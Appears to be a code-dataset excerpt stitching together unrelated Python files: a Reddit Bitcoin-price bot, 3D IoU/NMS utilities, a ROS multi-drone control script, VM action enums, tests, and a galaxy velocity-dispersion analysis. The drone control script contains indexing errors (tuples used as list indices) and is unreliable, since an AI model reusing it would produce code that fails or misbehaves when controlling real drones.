'Accepts': 'application/json',
'X-CMC_PRO_API_KEY': coin_key,
}
session = Session()
session.headers.update(headers)
parameters = {
'id':'1' #id 1 belongs to bitcoin
}
#sends GET request
try:
response = session.get(coin_url, params=parameters)
data = json.loads(response.text)
btc = data["data"]["1"]["quote"]["USD"]["price"] #coinmarketcap api request sets btc price
print(str(data["data"]["1"]["quote"]["USD"]["price"]) + '\n \n API request succesful.')
except (ConnectionError, Timeout, TooManyRedirects) as e:
print(e)
#price movement comparisons for submission type
if btc > btc_prev and btc > 9000 and btc_prev < 9000:
reddit.subreddit('BTC9K').submit(over_title, url=over_url)
print('over @ ' + str(btc))
elif btc < btc_prev and btc < 9000 and btc_prev > 9000:
reddit.subreddit('BTC9K').submit(under_title, url=under_url)
print('under @ ' + str(btc))
btc_prev = btc
btc_text = open("prev_price.txt", "w") #opens previous price file
btc_text.write(str(btc_prev))
btc_text.close()
|
python
|
"""
3D IoU Calculation and Rotated NMS
Written by Shaoshuai Shi
All Rights Reserved 2019-2020.
"""
import torch
import numpy as np
from opencood.utils.common_utils import check_numpy_to_torch
from opencood.pcdet_utils.iou3d_nms import iou3d_nms_cuda
def boxes_bev_iou_cpu(boxes_a, boxes_b):
"""
Args:
boxes_a: (N, 7) [x, y, z, dx, dy, dz, heading]
boxes_b: (N, 7) [x, y, z, dx, dy, dz, heading]
Returns:
"""
boxes_a, is_numpy = check_numpy_to_torch(boxes_a)
boxes_b, is_numpy = check_numpy_to_torch(boxes_b)
assert not (boxes_a.is_cuda or boxes_b.is_cuda), 'Only support CPU tensors'
assert boxes_a.shape[1] == 7 and boxes_b.shape[1] == 7
ans_iou = boxes_a.new_zeros(torch.Size((boxes_a.shape[0], boxes_b.shape[0])))
iou3d_nms_cuda.boxes_iou_bev_cpu(boxes_a.contiguous(), boxes_b.contiguous(), ans_iou)
return ans_iou.numpy() if is_numpy else ans_iou
def boxes_iou_bev(boxes_a, boxes_b):
"""
Args:
boxes_a: (N, 7) [x, y, z, dx, dy, dz, heading]
boxes_b: (N, 7) [x, y, z, dx, dy, dz, heading]
Returns:
ans_iou: (N, M)
"""
assert boxes_a.shape[1] == boxes_b.shape[1] == 7
ans_iou = torch.cuda.FloatTensor(torch.Size((boxes_a.shape[0], boxes_b.shape[0]))).zero_()
iou3d_nms_cuda.boxes_iou_bev_gpu(boxes_a.contiguous(), boxes_b.contiguous(), ans_iou)
return ans_iou
def decode_boxes_and_iou3d(boxes_a, boxes_b, pc_range, box_mean, box_std):
"""
Transform the boxes format back to [x, y, z, dx, dy, dz, heading] and calculate iou
:param boxes_a: (N, 7) [x_n, y_n, z_n, dx_n, dy_n, dz_n, heading_n] normalized
:param boxes_b: (M, 7) [x_n, y_n, z_n, dx_n, dy_n, dz_n, heading_n]
:param pc_range: point cloud range
:param object_ave_size: average object size
:return: ans_iou: (N, M)
"""
boxes_a_dec = decode_boxes(boxes_a, pc_range, box_mean, box_std)
boxes_b_dec = decode_boxes(boxes_b, pc_range, box_mean, box_std)
iou = boxes_iou3d_gpu(boxes_a_dec, boxes_b_dec)
return iou
def decode_boxes(boxes, pc_range, box_mean, box_std):
assert len(boxes.shape)==2
assert boxes.shape[1]==8
if isinstance(box_mean, list):
box_mean = torch.tensor(box_mean, device=boxes.device)
if isinstance(box_std, list):
box_std = torch.tensor(box_std, device=boxes.device)
boxes = boxes * box_std[None, :] + box_mean[None, :]
boxes_out = torch.zeros((boxes.shape[0], 7), dtype=boxes.dtype, device=boxes.device)
for i in range(3):
boxes_out[:, i] = boxes[:, i] * (pc_range[i + 3] - pc_range[i]) + pc_range[i]
boxes_out[:, 3:6] = boxes[:, 3:6].exp()
boxes_out[:, 6] = torch.atan2(boxes[:, 6], boxes[:, 7])
return boxes_out
def decode_boxes_and_giou3d(boxes_a, boxes_b, pc_range, box_mean, box_std):
boxes_a_dec = decode_boxes(boxes_a, pc_range, box_mean, box_std)
boxes_b_dec = decode_boxes(boxes_b, pc_range, box_mean, box_std)
corners_a = centroid_to_corners(boxes_a_dec)
corners_b = centroid_to_corners(boxes_b_dec)
iou, union = boxes_iou3d_gpu(boxes_a_dec, boxes_b_dec, return_union=True)
lwh = torch.max(corners_a.max(dim=1)[0][:, None, :], corners_b.max(dim=1)[0]) \
-torch.min(corners_a.min(dim=1)[0][:, None, :], corners_b.min(dim=1)[0])
volume = lwh[..., 0] * lwh[..., 1] * lwh[..., 2]
giou = iou - (volume - union) / volume
return giou
def giou3d(boxes_a_dec, boxes_b_dec):
corners_a = centroid_to_corners(boxes_a_dec)
corners_b = centroid_to_corners(boxes_b_dec)
iou, union = boxes_iou3d_gpu(boxes_a_dec, boxes_b_dec, return_union=True)
lwh = torch.max(corners_a.max(dim=1)[0][:, None, :], corners_b.max(dim=1)[0]) \
-torch.min(corners_a.min(dim=1)[0][:, None, :], corners_b.min(dim=1)[0])
volume = lwh[..., 0] * lwh[..., 1] * lwh[..., 2]
giou = iou - (volume - union) / volume
return giou
def aligned_boxes_iou3d_gpu(boxes_a, boxes_b, return_union=False):
"""
Args:
boxes_a: (N, 7) [x, y, z, dx, dy, dz, heading]
boxes_b: (N, 7) [x, y, z, dx, dy, dz, heading]
Returns:
ans_iou: (N, 1)
"""
assert boxes_a.shape[1] == boxes_b.shape[1] == 7
assert boxes_a.shape[0] == boxes_b.shape[0]
# height overlap
boxes_a_height_max = (boxes_a[:, 2] + boxes_a[:, 5] / 2).view(-1, 1)
boxes_a_height_min = (boxes_a[:, 2] - boxes_a[:, 5] / 2).view(-1, 1)
boxes_b_height_max = (boxes_b[:, 2] + boxes_b[:, 5] / 2).view(-1, 1)
boxes_b_height_min = (boxes_b[:, 2] - boxes_b[:, 5] / 2).view(-1, 1)
# bev overlap
overlaps_bev = torch.cuda.FloatTensor(torch.Size((boxes_a.shape[0], boxes_b.shape[0]))).zero_() # (N, M)
iou3d_nms_cuda.boxes_overlap_bev_gpu(boxes_a.contiguous(), boxes_b.contiguous(), overlaps_bev)
overlaps_bev = torch.diagonal(overlaps_bev).reshape(-1, 1)
max_of_min = torch.max(boxes_a_height_min, boxes_b_height_min)
min_of_max = torch.min(boxes_a_height_max, boxes_b_height_max)
overlaps_h = torch.clamp(min_of_max - max_of_min, min=0)
# 3d iou
overlaps_3d = overlaps_bev * overlaps_h
vol_a = (boxes_a[:, 3] * boxes_a[:, 4] * boxes_a[:, 5]).view(-1, 1)
vol_b = (boxes_b[:, 3] * boxes_b[:, 4] * boxes_b[:, 5]).view(-1, 1)
union = torch.clamp(vol_a + vol_b - overlaps_3d, min=1e-6)
iou3d = overlaps_3d / union
if return_union:
return iou3d, union
return iou3d
def boxes_iou3d_gpu(boxes_a, boxes_b, return_union=False):
"""
Args:
boxes_a: (N, 7) [x, y, z, dx, dy, dz, heading]
boxes_b: (N, 7) [x, y, z, dx, dy, dz, heading]
Returns:
ans_iou: (N, M)
"""
assert boxes_a.shape[1] == boxes_b.shape[1] == 7
# height overlap
boxes_a_height_max = (boxes_a[:, 2] + boxes_a[:, 5] / 2).view(-1, 1)
boxes_a_height_min = (boxes_a[:, 2] - boxes_a[:, 5] / 2).view(-1, 1)
boxes_b_height_max = (boxes_b[:, 2] + boxes_b[:, 5] / 2).view(1, -1)
boxes_b_height_min = (boxes_b[:, 2] - boxes_b[:, 5] / 2).view(1, -1)
# bev overlap
overlaps_bev = torch.cuda.FloatTensor(torch.Size((boxes_a.shape[0], boxes_b.shape[0]))).zero_() # (N, M)
iou3d_nms_cuda.boxes_overlap_bev_gpu(boxes_a.contiguous(), boxes_b.contiguous(), overlaps_bev)
max_of_min = torch.max(boxes_a_height_min, boxes_b_height_min)
min_of_max = torch.min(boxes_a_height_max, boxes_b_height_max)
overlaps_h = torch.clamp(min_of_max - max_of_min, min=0)
# 3d iou
overlaps_3d = overlaps_bev * overlaps_h
vol_a = (boxes_a[:, 3] * boxes_a[:, 4] * boxes_a[:, 5]).view(-1, 1)
vol_b = (boxes_b[:, 3] * boxes_b[:, 4] * boxes_b[:, 5]).view(1, -1)
union = torch.clamp(vol_a + vol_b - overlaps_3d, min=1e-6)
iou3d = overlaps_3d / union
if return_union:
return iou3d, union
return iou3d
def centroid_to_corners(boxes):
if isinstance(boxes, np.ndarray):
corners = _centroid_to_corners_np(boxes)
elif isinstance(boxes, torch.Tensor):
corners = _centroid_to_corners_torch(boxes)
else:
raise TypeError('Input boxes should either be numpy array or torch tensor.')
return corners
def _centroid_to_corners_torch(boxes):
'''Convert boxes from centroid format to corners
:param boxes: [N, 7]
:return: corners: [N, 8, 3]
'''
corners = torch.zeros((boxes.shape[0], 8, 3), dtype=boxes.dtype, device=boxes.device)
sin_t = torch.sin(boxes[:, -1])
cos_t = torch.cos(boxes[:, -1])
corners[:, ::4, 0] = torch.stack([boxes[:, 0] + boxes[:, 3] / 2 * cos_t - boxes[:, 4] / 2 * sin_t] * 2, dim=1) # lfx
corners[:, ::4, 1] = torch.stack([boxes[:, 1] + boxes[:, 3] / 2 * sin_t + boxes[:, 4] / 2 * cos_t] * 2, dim=1) # lfy
corners[:, 1::4, 0] = torch.stack([boxes[:, 0] - boxes[:, 3] / 2 * cos_t - boxes[:, 4] / 2 * sin_t] * 2, dim=1) # lbx
corners[:, 1::4, 1] = torch.stack([boxes[:, 1] - boxes[:, 3] / 2 * sin_t + boxes[:, 4] / 2 * cos_t] * 2, dim=1) # lby
corners[:, 2::4, 0] = torch.stack([boxes[:, 0] - boxes[:, 3] / 2 * cos_t + boxes[:, 4] / 2 * sin_t] * 2, dim=1) # rbx
corners[:, 2::4, 1] = torch.stack([boxes[:, 1] - boxes[:, 3] / 2 * sin_t - boxes[:, 4] / 2 * cos_t] * 2, dim=1) # rby
corners[:, 3::4, 0] = torch.stack([boxes[:, 0] + boxes[:, 3] / 2 * cos_t + boxes[:, 4] / 2 * sin_t] * 2, dim=1) # rfx
corners[:, 3::4, 1] = torch.stack([boxes[:, 1] + boxes[:, 3] / 2 * sin_t - boxes[:, 4] / 2 * cos_t] * 2, dim=1) # rfy
corners[:, :, 2] = torch.cat([torch.stack([boxes[:, 2] - boxes[:, 5] / 2] * 4, dim=1),
torch.stack([boxes[:, 2] + boxes[:, 5] / 2] * 4, dim=1)], dim=1)
return corners
def _centroid_to_corners_np(boxes):
'''Convert boxes from centroid format to corners
:param boxes: [N, 7]
:return: corners: [N, 8, 3]
'''
corners = np.zeros((boxes.shape[0], 8, 3), dtype=boxes.dtype)
sin_t = np.sin(boxes[:, -1])
cos_t = np.cos(boxes[:, -1])
corners[:, ::4, 0] = np.stack([boxes[:, 0] + boxes[:, 3] / 2 * cos_t - boxes[:, 4] / 2 * sin_t] * 2, axis=1) # lfx
corners[:, ::4, 1] = np.stack([boxes[:, 1] + boxes[:, 3] / 2 * sin_t + boxes[:, 4] / 2 * cos_t] * 2, axis=1) # lfy
corners[:, 1::4, 0] = np.stack([boxes[:, 0] - boxes[:, 3] / 2 * cos_t - boxes[:, 4] / 2 * sin_t] * 2, axis=1) # lbx
corners[:, 1::4, 1] = np.stack([boxes[:, 1] - boxes[:, 3] / 2 * sin_t + boxes[:, 4] / 2 * cos_t] * 2, axis=1) # lby
corners[:, 2::4, 0] = np.stack([boxes[:, 0] - boxes[:, 3] / 2 * cos_t + boxes[:, 4] / 2 * sin_t] * 2, axis=1) # rbx
corners[:, 2::4, 1] = np.stack([boxes[:, 1] - boxes[:, 3] / 2 * sin_t - boxes[:, 4] / 2 * cos_t] * 2, axis=1) # rby
corners[:, 3::4, 0] = np.stack([boxes[:, 0] + boxes[:, 3] / 2 * cos_t + boxes[:, 4] / 2 * sin_t] * 2, axis=1) # rfx
corners[:, 3::4, 1] = np.stack([boxes[:, 1] + boxes[:, 3] / 2 * sin_t - boxes[:, 4] / 2 * cos_t] * 2, axis=1) # rfy
corners[:, :, 2] = np.concatenate([np.stack([boxes[:, 2] - boxes[:, 5] / 2] * 4, axis=1),
np.stack([boxes[:, 2] + boxes[:, 5] / 2] * 4, axis=1)], axis=1)
return corners
def rotate_weighted_nms_gpu(
box_preds,
rbboxes,
dir_labels,
labels_preds,
scores,
iou_preds,
anchors,
pre_max_size=None,
post_max_size=None,
iou_threshold=0.5,
):
"""Original definition can be found in CIA_SSD paper"""
if pre_max_size is not None:
num_keeped_scores = scores.shape[0]
def nms_gpu(boxes, scores, thresh, pre_maxsize=None, **kwargs):
"""
Operate on rotated bev boxes[x,y,dx,dy,heading]
:param boxes: (N, 7) [x, y, z, dx, dy, dz, heading]
:param scores: (N)
:param thresh:
:return:
"""
assert boxes.shape[1] == 7
order = scores.sort(0, descending=True)[1]
if pre_maxsize is not None:
order = order[:pre_maxsize]
boxes = boxes[order].contiguous()
keep = torch.LongTensor(boxes.size(0))
num_out = iou3d_nms_cuda.nms_gpu(boxes, keep, thresh)
return order[keep[:num_out].cuda()].contiguous(), None
def nms_normal_gpu(boxes, scores, thresh, **kwargs):
"""
Ignore heading and operate on bev boxes[x,y,dx,dy]
:param boxes: (N, 7) [x, y, z, dx, dy, dz, heading]
:param scores: (N)
:param thresh:
:return:
"""
assert boxes.shape[1] == 7
order = scores.sort(0, descending=True)[1]
boxes = boxes[order].contiguous()
keep = torch.LongTensor(boxes.size(0))
num_out = iou3d_nms_cuda.nms_normal_gpu(boxes, keep, thresh)
return order[keep[:num_out].cuda()].contiguous(), None
|
python
|
#! /usr/bin/env python
import rospy
from time import time, sleep
from datetime import datetime
from ar_track_alvar_msgs.msg import AlvarMarkers
from controlmulti import *
from callback_alvar import *
if __name__ == '__main__':
# try:
rospy.init_node('control_node', anonymous= False)
rate = rospy.Rate(10)
drone_1 = ('192.168.11.40', 8889)
drone_2 = ('192.168.11.33', 8889)
drone_3 = ('192.168.11.23', 8889)
drone = [drone_1, drone_2, drone_3]
#goal key for calling markers' goal
goal = ["front22","left26", "right24"]
# drone_4 = ('192.168.11.57', 8889)
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
sleep(1)
receiveThread = threading.Thread(target=receive)
receiveThread.daemon = True
receiveThread.start()
#enter sdk mode
send("command", 0, drone_1)
send("command", 0, drone_2)
send("command", 0, drone_3)
sleep(3)
#takeoff
send("takeoff", 0, drone_1)
send("takeoff", 0, drone_2)
send("takeoff", 0, drone_3)
sleep(8)
#form a line to a non AR (manual)
#use marker first to get the position
send("go -100 -20 60 10", 0, drone_1)
send("go 70 20 100 10 ", 0, drone_2)
send("go 70 30 60 10", 0, drone_3)
sleep(1)
def feedbackcontrol(drone,goal):
count = 0
robot_in_pos = False
i = 0
while not rospy.is_shutdown():
for N in drone:
if count == 40:
send("land", 0, drone[N])
# send("land", 0, drone_2)
# send("land", 0, drone_3)
print("Mission failed")
sock1.close()
rospy.signal_shutdown('End of testing')
else:
if not robot_in_pos:
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
(drone_x, drone_y, goal_x, goal_y) = callback_alvmarker(AlvarMsg)
if drone_x != 0.0 and drone_y != 0.0 and goal_x[i] != 0.0 and goal_y[i] != 0.0:
#rotate drone to initial angle
print('\r\nDrone Position:')
print('x = %.2f' % drone_x)
print('y = %.2f' % drone_y)
print('')
sleep(1)
robot_in_pos = True
elif drone_x != 0.0 and drone_y != 0.0 and goal_x[i] == 0.0 and goal_y[i] == 0.0:
print("Mission completed successfully!")
robot_in_pos = False
i += 1
if i == 1:
robot_in_pos = False
send("land", 0, drone[N])
# send("land", 0, drone_2)
# send("land", 0, drone_3)
print("Mission completed successfully!")
sock1.close()
rospy.signal_shutdown('End of testing')
else:
robot_in_pos = False
count += 1
else:
#update the drone's current position
(drone_x, drone_y, goal_x, goal_y) = callback_alvmarker(AlvarMsg)
print ("drone x: %3.3f , drone y: %3.3f" % (drone_x, drone_y))
for j in drone:
status = move_xy(goal_x[i], goal_y[i], drone_x, drone_y, drone[j])
# sleep(1)
# status = move_xy(goal_x[i], goal_y[i], drone_x, drone_y, drone_2)
sleep(1)
if status == 'Goal Position reached':
print("Mission completed successfully!")
robot_in_pos = False
i += 1
if i == 1: #number of goals
robot_in_pos = False
send("land", 0, drone)
# send("land", 0, drone_2)
print("Mission completed successfully!")
sock1.close()
rospy.signal_shutdown('End of testing')
else:
count += 1
drone_x, drone_y = (0.0, 0.0)
goal_x[i], goal_y[i] = (0.0, 0.0)
robot_in_pos = False
feedbackcontrol(drone[0], "front22")
feedbackcontrol(drone[1], "left26")
feedbackcontrol(drone[2], "right24")
# except rospy.ROSInterruptException:
# send("land", 0, drone_1)
# send("land", 0, drone_2)
# sock1.close()
# print('Simulation terminated')
# pass
|
python
|
from enum import auto
import graphene
from serflag import SerFlag
from handlers.graphql.types.access import create_access_type
class VMActions(SerFlag):
attach_vdi = auto()
attach_network = auto()
rename = auto()
change_domain_type = auto()
VNC = auto()
launch_playbook = auto()
changing_VCPUs = auto()
changing_memory_limits = auto()
snapshot = auto()
clone = auto()
copy = auto()
create_template = auto()
revert = auto()
checkpoint = auto()
snapshot_with_quiesce = auto()
#provision = auto()
start = auto()
start_on = auto()
pause = auto()
unpause = auto()
clean_shutdown = auto()
clean_reboot = auto()
hard_shutdown = auto()
power_state_reset = auto()
hard_reboot = auto()
suspend = auto()
csvm = auto()
resume = auto()
resume_on = auto()
pool_migrate = auto()
migrate_send = auto()
shutdown = auto()
destroy = auto()
GVMActions = graphene.Enum.from_enum(VMActions)
GVMAccessEntry = create_access_type("GVMAccessEntry", GVMActions)
|
python
|
import numpy as np
from typing import Tuple, Union
from .values_generator import ValuesGenerator
class UniformGenerator(ValuesGenerator):
def __init__(
self,
bounds: Tuple[Union[int, float], Union[int, float]],
resolution: int = 1_000,
seed: int = None,
):
super(UniformGenerator, self).__init__(bounds, resolution, seed)
self.generator = np.random.default_rng(seed=seed)
def __call__(self, n: int = 1):
return self.generator.uniform(self.bounds[0], self.bounds[1], size=n)
|
python
|
from mimesis import Person
from tests.base import BaseTestCase
from tests.utils import add_user, add_group, add_user_group_association
class TestGroupModel(BaseTestCase):
"""
Test Group model
"""
# Generate fake data with mimesis
data_generator = Person('en')
def test_model_group_add_group(self):
"""Ensure a group can be added"""
group_name = self.data_generator.occupation()
group = add_group(name=group_name)
self.assertTrue(group.id)
self.assertEqual(group.name, group_name)
self.assertTrue(group.created_at)
self.assertTrue(group.updated_at)
self.assertEqual(len(group.associated_users), 0)
self.assertEqual(len(group.users), 0)
def test_model_group_verify_associated_users(self):
"""Ensure an added group has associated users"""
user = add_user()
group_name = self.data_generator.occupation()
group = add_group(name=group_name)
self.assertEqual(len(group.associated_users), 0)
add_user_group_association(user=user, group=group)
self.assertEqual(len(group.associated_users), 1)
self.assertEqual(group.associated_users[0].user.username, user.username)
self.assertEqual(len(group.users), 1)
self.assertEqual(group.users[0].username, user.username)
self.assertEqual(len(user.groups), 1)
self.assertEqual(user.groups[0].name, group_name)
|
python
|
'''
Usage:
python remove_from_env.py $PATH $TO_BE_REMOVED
returns $PATH without paths starting with $TO_BE_REMOVED
'''
import sys
ENV = sys.argv[1]
REMOVE = sys.argv[2]
new_path = []
for path in ENV.split(':'):
if path.startswith(REMOVE):
continue
new_path.append(path)
print ':'.join(new_path)
|
python
|
"""
{This script calculates spread in velocity dispersion (sigma) from mocks for
red and blue galaxies as well as smf for red and blue galaxies. It then
calculates a full correlation matrix using sigma and smf of both galaxy
populations as well as a correlation matrix of just sigma
measurements of both galaxy populations.
Mean velocity dispersion of red and blue galaxies in bins of central stellar
mass from data and mocks is also compared.}
"""
# Libs
from cosmo_utils.utils import work_paths as cwpaths
from scipy.stats import normaltest as nt
import matplotlib.pyplot as plt
from matplotlib import cm as cm
from matplotlib import rc
from scipy.stats import binned_statistic as bs
import random
import pandas as pd
import numpy as np
import os
__author__ = '{Mehnaaz Asad}'
rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']}, size=20)
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('xtick.major', width=2, size=7)
rc('ytick.major', width=2, size=7)
def reading_catls(filename, catl_format='.hdf5'):
"""
Function to read ECO/RESOLVE catalogues.
Parameters
----------
filename: string
path and name of the ECO/RESOLVE catalogue to read
catl_format: string, optional (default = '.hdf5')
type of file to read.
Options:
- '.hdf5': Reads in a catalogue in HDF5 format
Returns
-------
mock_pd: pandas DataFrame
DataFrame with galaxy/group information
Examples
--------
# Specifying `filename`
>>> filename = 'ECO_catl.hdf5'
# Reading in Catalogue
>>> mock_pd = reading_catls(filename, format='.hdf5')
>>> mock_pd.head()
x y z vx vy vz \
0 10.225435 24.778214 3.148386 356.112457 -318.894409 366.721832
1 20.945772 14.500367 -0.237940 168.731766 37.558834 447.436951
2 21.335835 14.808488 0.004653 967.204407 -701.556763 -388.055115
3 11.102760 21.782235 2.947002 611.646484 -179.032089 113.388794
4 13.217764 21.214905 2.113904 120.689598 -63.448833 400.766541
loghalom cs_flag haloid halo_ngal ... cz_nodist vel_tot \
0 12.170 1 196005 1 ... 2704.599189 602.490355
1 11.079 1 197110 1 ... 2552.681697 479.667489
2 11.339 1 197131 1 ... 2602.377466 1256.285409
3 11.529 1 199056 1 ... 2467.277182 647.318259
4 10.642 1 199118 1 ... 2513.381124 423.326770
vel_tan vel_pec ra_orig groupid M_group g_ngal g_galtype \
0 591.399858 -115.068833 215.025116 0 11.702527 1 1
1 453.617221 155.924074 182.144134 1 11.524787 4 0
2 1192.742240 394.485714 182.213220 1 11.524787 4 0
3 633.928896 130.977416 210.441320 2 11.502205 1 1
4 421.064495 43.706352 205.525386 3 10.899680 1 1
halo_rvir
0 0.184839
1 0.079997
2 0.097636
3 0.113011
4 0.057210
"""
## Checking if file exists
if not os.path.exists(filename):
msg = '`filename`: {0} NOT FOUND! Exiting..'.format(filename)
raise ValueError(msg)
## Reading file
if catl_format=='.hdf5':
mock_pd = pd.read_hdf(filename)
else:
msg = '`catl_format` ({0}) not supported! Exiting...'.format(catl_format)
raise ValueError(msg)
return mock_pd
def read_data_catl(path_to_file, survey):
"""
Reads survey catalog from file
Parameters
----------
path_to_file: `string`
Path to survey catalog file
survey: `string`
Name of survey
Returns
---------
catl: `pandas.DataFrame`
Survey catalog with grpcz, abs rmag and stellar mass limits
volume: `float`
Volume of survey
z_median: `float`
Median redshift of survey
"""
if survey == 'eco':
# columns = ['name', 'radeg', 'dedeg', 'cz', 'grpcz', 'absrmag',
# 'logmstar', 'logmgas', 'grp', 'grpn', 'logmh', 'logmh_s',
# 'fc', 'grpmb', 'grpms','modelu_rcorr']
# # 13878 galaxies
# eco_buff = pd.read_csv(path_to_file,delimiter=",", header=0, \
# usecols=columns)
eco_buff = reading_catls(path_to_file)
if mf_type == 'smf':
# 6456 galaxies
catl = eco_buff.loc[(eco_buff.grpcz.values >= 3000) &
(eco_buff.grpcz.values <= 7000) &
(eco_buff.absrmag.values <= -17.33)]
elif mf_type == 'bmf':
catl = eco_buff.loc[(eco_buff.grpcz.values >= 3000) &
(eco_buff.grpcz.values <= 7000) &
(eco_buff.absrmag.values <= -17.33)]
volume = 151829.26 # Survey volume without buffer [Mpc/h]^3
# cvar = 0.125
z_median = np.median(catl.grpcz.values) / (3 * 10**5)
elif survey == 'resolvea' or survey == 'resolveb':
columns = ['name', 'radeg', 'dedeg', 'cz', 'grpcz', 'absrmag',
'logmstar', 'logmgas', 'grp', 'grpn', 'grpnassoc', 'logmh',
'logmh_s', 'fc', 'grpmb', 'grpms', 'f_a', 'f_b']
# 2286 galaxies
resolve_live18 = pd.read_csv(path_to_file, delimiter=",", header=0, \
usecols=columns)
if survey == 'resolvea':
if mf_type == 'smf':
catl = resolve_live18.loc[(resolve_live18.f_a.values == 1) &
(resolve_live18.grpcz.values >= 4500) &
(resolve_live18.grpcz.values <= 7000) &
(resolve_live18.absrmag.values <= -17.33)]
elif mf_type == 'bmf':
catl = resolve_live18.loc[(resolve_live18.f_a.values == 1) &
(resolve_live18.grpcz.values >= 4500) &
(resolve_live18.grpcz.values <= 7000) &
(resolve_live18.absrmag.values <= -17.33)]
volume = 13172.384 # Survey volume without buffer [Mpc/h]^3
# cvar = 0.30
z_median = np.median(resolve_live18.grpcz.values) / (3 * 10**5)
elif survey == 'resolveb':
if mf_type == 'smf':
# 487 - cz, 369 - grpcz
catl = resolve_live18.loc[(resolve_live18.f_b.values == 1) &
(resolve_live18.grpcz.values >= 4500) &
(resolve_live18.grpcz.values <= 7000) &
(resolve_live18.absrmag.values <= -17)]
elif mf_type == 'bmf':
catl = resolve_live18.loc[(resolve_live18.f_b.values == 1) &
(resolve_live18.grpcz.values >= 4500) &
(resolve_live18.grpcz.values <= 7000) &
(resolve_live18.absrmag.values <= -17)]
volume = 4709.8373 # *2.915 #Survey volume without buffer [Mpc/h]^3
# cvar = 0.58
z_median = np.median(resolve_live18.grpcz.values) / (3 * 10**5)
return catl, volume, z_median
def assign_colour_label_data(catl):
"""
Assign colour label to data
Parameters
----------
catl: pandas Dataframe
Data catalog
Returns
---------
catl: pandas Dataframe
Data catalog with colour label assigned as new column
"""
logmstar_arr = catl.logmstar.values
u_r_arr = catl.modelu_rcorr.values
colour_label_arr = np.empty(len(catl), dtype='str')
for idx, value in enumerate(logmstar_arr):
# Divisions taken from Moffett et al. 2015 equation 1
if value <= 9.1:
if u_r_arr[idx] > 1.457:
colour_label = 'R'
else:
colour_label = 'B'
if value > 9.1 and value < 10.1:
divider = 0.24 * value - 0.7
if u_r_arr[idx] > divider:
colour_label = 'R'
else:
colour_label = 'B'
if value >= 10.1:
if u_r_arr[idx] > 1.7:
colour_label = 'R'
else:
colour_label = 'B'
colour_label_arr[idx] = colour_label
catl['colour_label'] = colour_label_arr
return catl
def std_func(bins, mass_arr, vel_arr):
## Calculate std from mean=0
last_index = len(bins)-1
i = 0
std_arr = []
for index1, bin_edge in enumerate(bins):
cen_deltav_arr = []
if index1 == last_index:
break
for index2, stellar_mass in enumerate(mass_arr):
if stellar_mass >= bin_edge and stellar_mass < bins[index1+1]:
cen_deltav_arr.append(vel_arr[index2])
N = len(cen_deltav_arr)
mean = 0
diff_sqrd_arr = []
for value in cen_deltav_arr:
diff = value - mean
diff_sqrd = diff**2
diff_sqrd_arr.append(diff_sqrd)
mean_diff_sqrd = np.mean(diff_sqrd_arr)
std = np.sqrt(mean_diff_sqrd)
std_arr.append(std)
return std_arr
def std_func_mod(bins, mass_arr, vel_arr):
mass_arr_bin_idxs = np.digitize(mass_arr, bins)
# Put all galaxies that would have been in the bin after the last in the
# bin as well i.e galaxies with bin number 5 and 6 from previous line all
# go in one bin
for idx, value in enumerate(mass_arr_bin_idxs):
if value == 6:
mass_arr_bin_idxs[idx] = 5
mean = 0
std_arr = []
for idx in range(1, len(bins)):
cen_deltav_arr = []
current_bin_idxs = np.argwhere(mass_arr_bin_idxs == idx)
cen_deltav_arr.append(np.array(vel_arr)[current_bin_idxs])
diff_sqrd_arr = []
# mean = np.mean(cen_deltav_arr)
for value in cen_deltav_arr:
# print(mean)
# print(np.mean(cen_deltav_arr))
diff = value - mean
diff_sqrd = diff**2
diff_sqrd_arr.append(diff_sqrd)
mean_diff_sqrd = np.mean(diff_sqrd_arr)
std = np.sqrt(mean_diff_sqrd)
# print(std)
# print(np.std(cen_deltav_arr))
std_arr.append(std)
return std_arr
def get_deltav_sigma_data(df):
"""
Measure spread in velocity dispersion separately for red and blue galaxies
by binning up central stellar mass (changes logmstar units from h=0.7 to h=1)
Parameters
----------
df: pandas Dataframe
Data catalog
Returns
---------
std_red: numpy array
Spread in velocity dispersion of red galaxies
centers_red: numpy array
Bin centers of central stellar mass for red galaxies
std_blue: numpy array
Spread in velocity dispersion of blue galaxies
centers_blue: numpy array
Bin centers of central stellar mass for blue galaxies
"""
catl = df.copy()
if survey == 'eco' or survey == 'resolvea':
catl = catl.loc[catl.logmstar >= 8.9]
elif survey == 'resolveb':
catl = catl.loc[catl.logmstar >= 8.7]
catl.logmstar = np.log10((10**catl.logmstar) / 2.041)
red_subset_grpids = np.unique(catl.groupid.loc[(catl.\
colour_label == 'R') & (catl.g_galtype == 1)].values)
blue_subset_grpids = np.unique(catl.groupid.loc[(catl.\
colour_label == 'B') & (catl.g_galtype == 1)].values)
# Calculating spread in velocity dispersion for galaxies in groups with a
# red central
red_deltav_arr = []
red_cen_stellar_mass_arr = []
for key in red_subset_grpids:
group = catl.loc[catl.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype.\
values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
red_deltav_arr.append(val)
red_cen_stellar_mass_arr.append(cen_stellar_mass)
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
red_stellar_mass_bins = np.linspace(8.6,11.2,6)
elif survey == 'resolveb':
red_stellar_mass_bins = np.linspace(8.4,11.0,6)
std_red = std_func_mod(red_stellar_mass_bins, red_cen_stellar_mass_arr,
red_deltav_arr)
std_red = np.array(std_red)
# Calculating spread in velocity dispersion for galaxies in groups with a
# blue central
blue_deltav_arr = []
blue_cen_stellar_mass_arr = []
for key in blue_subset_grpids:
group = catl.loc[catl.groupid == key]
cen_stellar_mass = group.logmstar.loc[group.g_galtype\
.values == 1].values[0]
mean_cz_grp = np.round(np.mean(group.cz.values),2)
deltav = group.cz.values - len(group)*[mean_cz_grp]
for val in deltav:
blue_deltav_arr.append(val)
blue_cen_stellar_mass_arr.append(cen_stellar_mass)
if survey == 'eco' or survey == 'resolvea':
# TODO : check if this is actually correct for resolve a
blue_stellar_mass_bins = np.linspace(8.6,10.7,6)
elif survey == 'resolveb':
blue_stellar_mass_bins = np.linspace(8.4,10.4,6)
std_blue = std_func_mod(blue_stellar_mass_bins, blue_cen_stellar_mass_arr,
blue_deltav_arr)
std_blue = np.array(std_blue)
